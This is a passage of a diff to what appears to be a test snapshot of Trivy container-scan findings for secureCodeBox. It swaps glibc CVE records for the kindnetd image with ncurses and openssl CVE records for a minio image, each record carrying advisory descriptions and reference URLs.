"value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", + "references": [ + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", + ], + }, + "category": "Vulnerability", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Local users can trigger security-relevant memory corruption via malformed data", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + 